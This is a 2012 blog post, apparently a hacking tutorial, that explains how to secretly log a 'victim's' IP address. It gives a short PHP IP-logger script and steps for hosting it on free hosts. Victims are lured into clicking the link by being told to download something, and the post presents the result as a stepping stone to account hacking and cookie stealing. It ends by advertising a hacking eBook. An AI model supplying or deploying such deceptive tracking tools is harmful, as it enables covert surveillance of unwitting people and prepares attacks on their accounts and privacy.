14 January, 2012

Learn How to Know or Steal your Victims IP Address



If you want to hack or crack someone accounts, Knowing your victims IP address will be an important issue to do it. As it is also need in cookie stealing techniques. Therefore, below is a simple php exploit to known your victims IP address by sending to it and saying for clicking or downloading etc..

Procedure-

1. First of all make an blank txt file in your computer and rename it as get.php
2. Then open it and paste the below code properly-
<?php
$file = 'IP.txt';
$handle = fopen($file,'a');
if(!isset($_GET['p'])) { header('Location:
http://google.com'); }
fwrite($handle, $_GET['p'].': '.$_SERVER
['REMOTE_ADDR'].'\r\n');
fclose($handle)
?>
3. now save the php file.
4. Then make another blank file with .txt extension and rename it with IP.txt for storing IP addresses.
5. Hence, you have now 2 files and start uploading them into free hosting companies like 110mb.com, my3gb.com, 50webs.com etc..
6. Recommended to upload these 2 files into my3gb.com and then copy the link of get.php file.
7. Done! now start sharing this link with your friends and ask them to click or download.
8. When anyone clicks, the IP address of him will get stored into your IP.txt file in my3gb.com account.
9. Therefore, note his/her IP address and do some hacking whatever you want.
…………………………………………………………………………………………………………………………………………………………..
Enjoy na! If you want to become an pure Ethical hacker and Computer Security Expert like me, please click here to download my new eBook on “Power of Hacking”.

No comments:

Post a Comment